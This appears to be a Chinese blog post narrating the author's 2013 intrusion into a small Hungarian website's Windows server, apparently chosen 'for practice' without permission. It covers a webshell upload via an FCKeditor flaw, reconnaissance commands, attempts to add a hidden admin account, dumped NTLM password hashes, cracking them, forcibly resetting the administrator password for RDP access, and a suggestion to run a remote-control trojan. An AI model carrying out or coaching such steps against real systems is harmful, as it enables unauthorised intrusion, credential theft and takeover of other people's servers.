0x01 前言
这个案例记录的是笔者2013年测试的一台服务器,大半夜醒来不知道干什么了,无聊的在“全球被黑站点统计系统”找到了一个匈牙利国家的小站来练手,直接利用BurpSutite成功突破Fckeditor2.5 PHP上传拿到Webshell权限,以前写过几篇Fckeditor-Getshell文章,这里就不再详细写了。
基本信息探测:
- 目标站点:http://www.forras**aldorf.hu
- 服务器IP:1*5.2*8.*6.1*4(匈牙利)
- 环境平台:PHP/5.2.5
- 服务器系统:Apache/2.2.8 (Win32)
0x02 实战提权过程
打开Webshell后我们先搜集一下服务器的基本信息,看下是否有可直接利用的溢出漏洞和第三方提权软件,根据自己的个人提权习惯来测试吧。
- 脚本探测:只支持php脚本,传个php大马,正常运行cmd;
- 端口扫描:使用netstat -ano命令或大马端口扫描功能都可以;
- 常用命令:命令太多了,根据实际情况使用吧,这里只列出部分常用的;
whoami //查看当前用户权限 net user //查看系统所有用户 tasklist //查看系统运行进程 net start //查看系统开放服务 systeminfo //查看系统补丁情况 netstat -ano //查看系统开放端口 net localgroup //查看系统所有用户组 net localgroup administrators //查看系统管理员用户
使用以上命令探测后得知:3389端口开放并能正常连接,nt authority\system权限,本以为可以直接添加管理员用户,但实际情况并非如此,在执行命令完成后虽然显示成功,但是在登录3389时才发现并没有成功加入到管理组中,无法进行3389远程连接。
接下来我们根据自己目前所掌握的方法来查找这台服务器的管理组:
- (1) net user:查看系统所有用户,使用“net user 用户名”命令来查看某个指定用户所属用户组有哪些,根据个人经验感觉Rendszergazda是管理员用户;
- (2) net localgroup:查看系统所有用户组,这个命令执行无效,返回信息显示空白,进入系统后发现是因为“工作站服务尚未启动”导致无法执行这个命令的;
\\ felhaszn爈 fijai ------------------------------------------------------------------------------- 123 ASPNET assil fwi_ftp IUSR_FWI IWAM_FWI Rendszergazda SUPPORT_388945a0 Vend俫 waldorf A parancs egy vagy t攂b hib爒al fejez媎攖t be.
用“net user Rendszergazda”命令得知Rendszergazda这个用户在Rendszergazdák管理组下,现在基本可以确定这个就是管理组了。
经过后面的测试发现在这个Webshell权限下无法将用户添加进管理组,但是进入系统后在命令终端就可以成功添加进管理组,猜测应该是网页编码的问题吧!
net user test$ 123456 /add //命令成功执行 net localgroup Rendszergazdák test$ /add //执行后无回显
注:使用国内Webshell时会因为语言编码不同而出现网页乱码情况,国外Webshell也会存在一些偏差,不过还是建议用国外Webshell,这里测试了我老半天,吭死!
经过一段时间的测试发现怎样都添加不进Rendszergazdák管理组,蛋碎了一地,在这里添加管理组我是已经没有办法了,求知道方法的朋友给讲解下!
既然这条路行不通,那我们就换条思路,既然都已经nt authority\system权限了,那就尝试一下直接读取/破解NTLM-HASH登录目标服务器系统。
ASPNET:1008:ED9484FAD76A1B8BC66692931AB9AEAD:F65E39C42FA620A3265EFC4F714C6808::: assil:1009:AF4D115A275D5B70AAD3B435B51404EE:F83C3E2D3A19154BEFF4E041AF78F542::: IUSR_FWI:1003:EA3F9A9F411F0310B04815DB5176242D:D633105705AF5D5131D88C4725DE1AA3::: IWAM_FWI:1006:4592B335CD4E3AF32917EB6BA2690CAC:452E7E5073B4660C3CE59A6F0C2C694F::: Rendszergazda:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0::: SUPPORT_388945a0:1001:AAD3B435B51404EEAAD3B435B51404EE:7B5C007108744103BE8E6AFCCCAD4BFE:: Vend間:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
在http://www.objectif-securite.ch成功破解Rendszergazda管理员用户的NTLM-HASH,但是明文密码居然为“空”,先用mstsc.exe远程登录看一下是否能够登录进去吧。
最终连接提示信息:Nem lephet be a fiok korlatozasi miatt,翻译过来就是:由于账户限制,您无法登陆。
问了下基佬@宝哥说是:该用户不在Administrators管理组或Remote Desktop Users远程登录组,我这个基佬不管说话、做事都不是很靠普,所以也就没信他说的!最后通过百度找到真实原因是:组策略中禁止空密码用户通过网络登录,http://article.pchome.net/content-580248.html。
最后实在是没办法了,只能通过执行“net user Rendszergazda 123456”命令来修改Rendszergazda管理员用户的密码,这种方式动静太大了,不到万不得已时并不推荐使用!
这台服务器大概测试了一个多小时才提下,被那个管理组整的我蛋疼,不知道还有没有其它方法能加进管理组。如果是system权限,我们还可以利用远控生成一个木马,然后在Webshell上直接运行即可。
0x03 问题总结
(1) 为什么在Webshell权限下无法将普通用户添加进管理组呢?
(2) 网站域名和IP地址都Ping不通,不知道是不是做了防Ping处理?
(3) netstat -ano命令查询没有3389端口,只有3390端口,但是都能正常远程连接?
(4) ipconfig /all命令执行返回如下:为什么IP是10.0.0.*(内网),但又能直接连接?
Windows IP konfiguráció Állomásnév. . . . . . . . . . . . . . : fwi Elsõdleges DNS-utótag . . . . . . . . : Csomóponttípus . . . . . . . . . . . : Ismeretlen IP-útválasztás engedélyezve . . . . . : Nem WINS-proxy engedélyezve . . . . . . . : Nem Ethernet-adapter Helyi kapcsolat: Kapcsolatspecifikus DNS-utótag. . . . : Leírás. . . . . . . . . . . . . . . . : Intel 21140 alapú PCI gyors Ethernet-adapter (általános) Fizikai cím . . . . . . . . . . . . . : 00-03-FF-7F-76-59 DHCP engedélyezve . . . . . . . . . . : Nem IP-cím. . . . . . . . . . . . . . . . : 10.0.0.2 Alhálózati maszk. . . . . . . . . . . : 255.255.255.0 Alapértelmezett átjáró. . . . . . . : 10.0.0.1 DNS-kiszolgálók . . . . . . . . . . . : 10.0.0.1
